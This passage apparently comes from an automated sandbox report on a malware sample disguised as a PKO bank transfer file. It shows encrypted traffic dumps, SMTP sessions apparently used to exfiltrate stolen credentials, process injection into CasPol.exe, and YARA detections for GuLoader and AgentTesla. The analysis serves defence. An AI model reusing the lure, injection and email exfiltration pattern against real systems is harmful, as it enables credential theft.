                                                        2021-12-16 12:20:36 UTC213INData Raw: 69 ba bd dc af 6f 32 95 88 54 af 2e 50 10 10 e6 25 d0 eb ef 73 8d 06 3e 4c 08 a1 f0 e2 bb 5a 0b b8 e5 f6 44 1d 2d ea 28 47 15 e1 54 98 6f 8a 4b d3 b6 87 d7 96 d2 65 17 b9 2f aa 45 83 21 ac a9 34 5b 35 35 f5 b1 d3 20 c6 38 56 be 8b ac 9e 30 20 98 ae b7 3f 14 7e ce bf bb 76 2f 54 7e 1d bd de 98 5d 44 4f 72 75 c3 e0 1f ba 36 bf 07 e2 c0 a2 1c fa 50 89 17 25 26 c7 42 eb 79 85 e3 58 19 5d 68 cd 1f 4e 0c 0d 54 c8 ab 79 b5 54 db 7f bd 64 56 23 55 00 1b ab ab fc d1 d8 ff 23 20 be fe 1a 68 ce 0f a3 06 15 5f 73 e4 b3 98 0c 2f 44 d9 a9 da 1e 5b 57 d0 40 f9 3b 0c 7a db b0 a7 5e 1e 3f 41 b9 90 eb 3a 4f e6 fc 0b 26 71 cf eb 7a 50 75 54 f8 97 3e 15 39 95 de 10 92 44 5f ef 6c 90 00 22 86 26 3f c2 78 97 0d 92 57 37 0a 47 e8 3a 36 ab c7 b1 7a 4c 61 1f 66 4d ed 05 f8 45 26
                                                        Data Ascii: io2T.P%s>LZD-(GToKe/E!4[55 8V0 ?~v/T~]DOru6P%&ByX]hNTyTdV#U# h_s/D[W@;z^?A:O&qzPuT>9D_l"&?xW7G:6zLafME&
                                                        2021-12-16 12:20:36 UTC214INData Raw: 8d 77 e0 f2 b4 9d 36 68 ba 3f d8 d2 3b 02 a1 24 4f e4 bf e9 e3 95 32 5f 1c 3e 02 51 ae 19 de df 44 aa ad e4 cb ca ae f2 e0 48 24 a1 dc 2a d4 5c 34 c7 90 9a 81 c6 a1 31 9c ac d4 da 55 ea f2 0b d7 a9 15 53 27 ab e5 ed cb 41 38 5e 21 77 97 8f 84 51 ba 6c 16 eb 27 99 b1 41 2c 50 20 b7 84 ae b8 52 92 7b 77 41 59 76 4c c3 cd 81 0a 5e b8 b7 5e cd 8e 0a 27 e2 8d 91 b1 2d 71 01 c9 37 35 cb 0d fb a8 9d e7 12 2e a5 7b 85 ef 3c 98 fb e8 c7 c5 32 5f 02 6d 8d 88 1d bf b8 0a 12 a7 84 4a 61 fe 49 2b 93 65 9f 6c b8 35 1a 66 93 d5 e7 57 30 9c 89 d0 69 f8 a8 9b e7 d6 0a e5 04 23 bd 6f b3 4e e1 98 a0 27 a0 91 67 eb 47 ec 1d 3b 32 b8 1b 36 cc 4d 43 7a 3c d8 21 b7 b4 fd 9b 59 b1 af 70 59 59 fd 98 6e ab b7 a4 53 01 c1 7b c6 95 0f 9c c9 c5 bc b2 8c e6 01 43 6a fa 8a d8 aa 32 b1
                                                        Data Ascii: w6h?;$O2_>QDH$*\41US'A8^!wQl'A,P R{wAYvL^^'-q75.{<2_mJaI+el5fW0i#oN'gG;26MCz<!YpYYnS{Cj2
                                                        2021-12-16 12:20:36 UTC215INData Raw: 07 b7 da bc 6f 27 86 8b 7c a7 29 2b 9a a9 ec 2b d8 fd ee 76 9a 1a b2 d4 0d bd eb fb 1a c3 1f bb e6 03 48 00 38 eb a8 d9 01 e2 57 6d 63 8a 4b c6 bf 8d d8 12 ef 6a 92 40 30 a5 5d 0c 74 ac 42 31 51 31 3c f3 b1 c0 20 c6 3e 4d a7 01 02 9b 32 32 82 31 80 38 0e 7e dd b4 a8 61 54 cb f9 06 b8 c0 9c 41 c8 60 7d 77 d4 9c 0a 3b ad a2 14 fa d3 b5 8f 44 4a ee 0d b9 84 d3 e0 6f 65 1a 5b 44 9f 40 7a b6 98 af 0a 3f d6 e7 23 9c b8 59 c6 7b a8 62 45 2f 5a 03 2e b8 2b 78 d3 d2 e5 2f 32 be e7 14 61 ff 06 9c 14 0d cb f8 64 38 18 5e bb 16 4a 54 d5 05 5c c4 c8 d8 ea a8 cd 34 db ac 28 0c 90 8a 5e 29 4c e1 29 5f e6 ff 46 36 16 c9 e3 65 da ca 56 f5 88 b5 df 20 8a 4e 40 13 49 77 e7 78 30 90 3d 07 b8 29 da fe 08 04 9d d3 6a 01 47 ee 3e 5c ab aa b7 00 49 00 56 0f 5a 8b 17 6b db 2f ae
                                                        Data Ascii: o'|)++vH8WmcKj@0]tB1Q1< >M2218~aTA`}w;DJoe[D@z?#Y{bE/Z.+x/2ad8^JT\4(^)L)_F6eV N@Iwx0=)jG>\IVZk/
                                                        2021-12-16 12:20:36 UTC216INData Raw: 70 ea f8 46 9b 2a 7a 3c 1c d5 40 ce 1b e4 39 53 f9 a7 f4 e3 9c 12 59 0e b8 3b 4c af 04 cb d3 43 a8 bf e1 d7 d7 b6 1f fc 55 26 ad da 05 d6 5d 3e da 65 94 81 c2 a6 2a 8c 9f d1 c2 4f ea ed 96 69 99 1a 4e 32 36 48 e5 d1 40 38 5e 1d 78 8b ba 97 d8 2b 60 03 60 65 86 ab c8 a9 4c 37 3e cc a8 ac 59 bc 71 60 4c 5f 60 ed c2 d3 83 10 57 a1 a0 49 d7 07 42 30 ab 87 87 ba 38 78 1b c5 21 2e de 12 f6 a0 95 e9 9a 8f a3 72 bc 6b a8 85 e1 61 56 c0 00 df 43 73 94 09 86 af 29 0e 43 2c 1d 55 fe 75 41 39 10 64 80 fd bc 71 14 7f 02 39 f3 d6 90 9f 90 58 ec f8 a6 94 ee c9 81 68 1c a1 ee 6f a2 ce 6c 87 2d b3 26 c0 60 e0 58 e9 13 31 28 3e 12 25 4d 4c 55 f8 34 d2 3f ae 34 55 83 4e ab a5 73 4b 59 f2 83 77 25 1d a4 47 03 ca 76 c7 9c 15 1a 57 cc ba a7 8a ff 12 5c e4 4f 80 cd a6 bc 1d 33
                                                        Data Ascii: pF*z<@9SY;LCU&]>e*OiN26H@8^x+``eL7>Yq`L_`WIB08x!.rkaVCs)C,UuA9dq9Xhol-&`X1(>%MLU4?4UNsKYw%GvW\O3
                                                        2021-12-16 12:20:36 UTC218INData Raw: 3f 2b a9 60 2d 89 03 90 bd bb a6 9e a1 e7 24 50 1c fc f4 4d 05 3c 04 08 a7 f9 eb 89 da f2 bb e7 b2 4d 2e 29 eb a9 ac 11 70 3e 23 63 8a 43 dc b3 97 45 fb ef 67 b7 58 27 2d a3 9c b4 56 25 2b d9 ee 2a 7a 86 c0 26 cf 34 51 2f e5 0b 1c d2 3c 97 bf a4 38 1d 73 ce ac bb 6a 48 4a 78 06 b3 d5 84 5d 43 61 64 73 d7 75 e5 35 a1 b0 01 f8 c8 b9 97 4b 48 e8 0d 8c 80 d3 6a ff 79 86 c7 57 0e fd 84 ca 8f 0e 93 2c 47 5a c5 bb b7 58 c9 ff d5 68 5f 2b 58 0f 07 be 23 74 51 ef eb 3f ae 5a e5 14 62 e4 15 b6 1b 0d fe ea f0 b3 98 d5 3b 44 d8 dc d7 17 49 47 5f db e4 34 91 27 c9 a3 ab 4b 9e 9d 4e a5 e8 62 1e 4d d4 7f 49 26 98 2b f8 7d 78 7d 56 e9 06 50 ca a5 51 50 c6 88 5c 7a e5 7c 02 11 fa 9b 20 22 d7 d9 0c 06 8a c7 f4 d5 43 c6 35 5b b9 28 64 0c cf d1 1d 0d 4d 9c 0f e0 48 29 bb 30
                                                        Data Ascii: ?+`-$PM<M.)p>#cCEgX'-V%+*z&4Q/<8sjHJx]Cadsu5KHjyW,GZXh_+X#tQ?Zb;DIG_4'KNbMI&+}x}VPQP\z| "C5[(dMH)0
                                                        2021-12-16 12:20:36 UTC219INData Raw: f8 7d 34 9d 2f 7f 2a 9b cc d1 d3 1b ac 24 56 f1 be f1 e9 81 17 48 1f 3d 9e 4d b9 85 d3 d4 63 ae a2 60 4a d9 ae e8 dc 57 34 28 47 02 de 55 2f cb 14 31 80 d2 21 25 8b b1 da d6 c8 f3 f6 3e c5 89 0e d2 ba b7 f2 62 de 40 36 44 97 31 84 ba 92 d1 31 ef 45 77 62 91 a6 c8 bf 56 34 3e d9 a5 b9 59 94 7b 62 47 5d 65 c5 c9 c1 88 15 4e a4 bb 5c df 11 4a 33 ab 87 91 b7 38 63 10 a6 2a 41 d6 6e fc 9d 9f c4 90 a1 ab 63 aa e6 30 88 f4 6c 42 d8 28 d6 5f 64 82 15 99 bc a2 83 4e b2 84 4c 79 f0 46 3c 0d 69 b1 7f 24 70 10 7e 86 b4 e9 cb 94 89 9d c6 75 e3 ba 88 f5 c5 07 e5 11 a7 fe e3 b2 48 e9 96 bc b2 23 c6 66 e9 59 e7 01 5a 30 9c 18 2a ca 58 42 67 38 cb 27 b5 b3 ff 87 4c a2 a2 76 5f 59 f2 94 66 a6 bc a2 4a 8d d3 6e 49 89 16 1a 56 ca a0 2e 1f fe 07 50 61 ef 8c d7 b4 21 bc 2a 97
                                                        Data Ascii: }4/*$VH=Mc`JW4(GU/1!%>b@6D11EwbV4>Y{bG]eN\J38c*Anc0lB(_dNLyF<i$p~uH#fYZ0*XBg8'Lv_YfJnIV.Pa!*
                                                        2021-12-16 12:20:36 UTC220INData Raw: 81 a1 13 2f e9 83 1d af 55 42 f5 a1 a2 36 b9 f8 82 74 fd 14 f5 fd 64 af 98 e9 f4 5a 1e a9 87 42 46 0e 2c f9 19 40 30 f0 e6 2d 5d 84 75 db 85 85 a7 17 d7 77 97 5d 19 ad 4d 8d 35 be 6d 39 30 3b 57 fb da ce 6a c8 53 43 dc 09 7a 9c 4c 2e f9 b3 c9 36 67 7b a9 b1 da 64 28 49 70 1b bd dd b9 53 4a 41 50 72 ce f5 0c 3b e9 be 60 ff a2 b0 fb 43 14 e0 60 a4 f5 c1 11 ea 02 07 31 56 72 7d 68 df 9d 8f 3a 2d 7b da 19 bc 93 51 eb 7e 8e 6a 68 2c 52 06 66 b9 0e 65 d1 d6 ab 2d 40 b6 97 14 05 e3 7a b3 7d 07 bf ea 89 a1 57 4c 5b 56 35 30 be 10 4e 45 21 d9 bf 29 e2 3a 82 be f3 4c ff 9f 05 ab 93 e3 72 4a 84 7d 07 34 7c c7 a7 74 3b 7f 2c fb d1 bc 96 25 e6 5c 8a 8e 2c 7f b5 7e 73 91 4d 86 57 2a 91 f9 69 0c f3 d6 32 04 0e e6 59 5a c5 a8 9f 1d 29 08 67 08 28 9e 05 ea 6a 2e be 33 52
                                                        Data Ascii: /UB6tdZBF,@0-]uw]M5m90;WjSCzL.6g{d(IpSJAPr;`C`1Vr}h:-{Q~jh,Rfe-@z}WL[V50NE!):LrJ}4|t;,%\,~sMW*i2YZ)g(j.3R
                                                        2021-12-16 12:20:36 UTC221INData Raw: fc a9 98 2a 7a 38 1a c4 c0 52 1f a4 39 53 f9 a3 f4 e1 9c 12 5d 0e bc 3b 4c ab 04 db d3 43 ac b0 e1 d7 d7 b2 ef fc 55 26 a9 da 0a d6 5d 3a da 95 94 81 c0 a0 2d 8e 99 da c7 49 f7 fc 16 c5 9c 1c 53 23 b6 e0 e3 d6 44 30 56 15 70 8f 9a 96 d0 23 6d 04 6a 67 8c a3 c0 b5 51 32 36 c4 a0 a4 5c 9c 73 6a 44 57 64 cd c3 d1 89 17 50 a4 ab 42 df 0f 4a 35 8b 85 8c b2 30 6d 1c d5 2a 29 d6 0f fc a8 9f f5 90 93 ab 75 ad e8 2d 8d e9 69 5e c4 20 de 42 78 9f 09 84 be aa 8b 52 af 98 44 7d f0 47 39 11 6c 91 7e 39 75 12 6e 81 bc f5 d6 91 94 81 db 69 fe a6 95 e9 d8 02 ed 15 a1 ec 67 b3 4d e9 96 ae 36 22 c0 61 eb 44 e2 13 33 3a bc 1b 37 cf 45 47 7a 3d d6 22 bf b4 f9 9a 49 bf a7 78 57 51 fa 9e 66 a5 b9 ac 5b 09 d6 7c cd 80 1d 1d 50 c4 b2 af 82 fb 0f 4d 64 e7 84 d0 b7 3c b9 37 92 01
                                                        Data Ascii: *z8R9S];LCU&]:-IS#D0Vp#mjgQ26\sjDWdPBJ50m*)u-i^ BxRD}G9l~9unigM6"aD3:7EGz="IxWQf[|PMd<7


                                                        SMTP Packets

                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                        Dec 16, 2021 13:22:13.781223059 CET5874984777.88.21.158192.168.11.20220 vla1-62318bfe5573.qloud-c.yandex.net ESMTP (Want to use Yandex.Mail for your domain? Visit http://pdd.yandex.ru) 1639657333-kVhxO0Hnwu-MCPGFRub
                                                        Dec 16, 2021 13:22:13.781666994 CET49847587192.168.11.2077.88.21.158EHLO 830021
                                                        Dec 16, 2021 13:22:13.829278946 CET5874984777.88.21.158192.168.11.20250-vla1-62318bfe5573.qloud-c.yandex.net
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-SIZE 42991616
                                                        250-STARTTLS
                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                        250-DSN
                                                        250 ENHANCEDSTATUSCODES
                                                        Dec 16, 2021 13:22:13.829705000 CET49847587192.168.11.2077.88.21.158STARTTLS
                                                        Dec 16, 2021 13:22:13.877150059 CET5874984777.88.21.158192.168.11.20220 Go ahead
                                                        Dec 16, 2021 13:22:17.311849117 CET5874984877.88.21.158192.168.11.20220 vla1-62318bfe5573.qloud-c.yandex.net ESMTP (Want to use Yandex.Mail for your domain? Visit http://pdd.yandex.ru) 1639657337-qrfztcLdqV-MHP4j94W
                                                        Dec 16, 2021 13:22:17.312375069 CET49848587192.168.11.2077.88.21.158EHLO 830021
                                                        Dec 16, 2021 13:22:17.362488031 CET5874984877.88.21.158192.168.11.20250-vla1-62318bfe5573.qloud-c.yandex.net
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-SIZE 42991616
                                                        250-STARTTLS
                                                        250-AUTH LOGIN PLAIN XOAUTH2
                                                        250-DSN
                                                        250 ENHANCEDSTATUSCODES
                                                        Dec 16, 2021 13:22:17.362761021 CET49848587192.168.11.2077.88.21.158STARTTLS
                                                        Dec 16, 2021 13:22:17.412688017 CET5874984877.88.21.158192.168.11.20220 Go ahead

                                                        Code Manipulations

                                                        Statistics

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Start time:13:19:35
                                                        Start date:16/12/2021
                                                        Path:C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe"
                                                        Imagebase:0x400000
                                                        File size:147456 bytes
                                                        MD5 hash:1823B507E96D8138BADA7C65D424ABCC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Visual Basic
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.329868071073.0000000002B70000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        General

                                                        Start time:13:20:18
                                                        Start date:16/12/2021
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe"
                                                        Imagebase:0x4a0000
                                                        File size:108664 bytes
                                                        MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:13:20:18
                                                        Start date:16/12/2021
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe"
                                                        Imagebase:0x7e0000
                                                        File size:108664 bytes
                                                        MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000000.329673621404.0000000000BC0000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        General

                                                        Start time:13:20:19
                                                        Start date:16/12/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7d9870000
                                                        File size:875008 bytes
                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >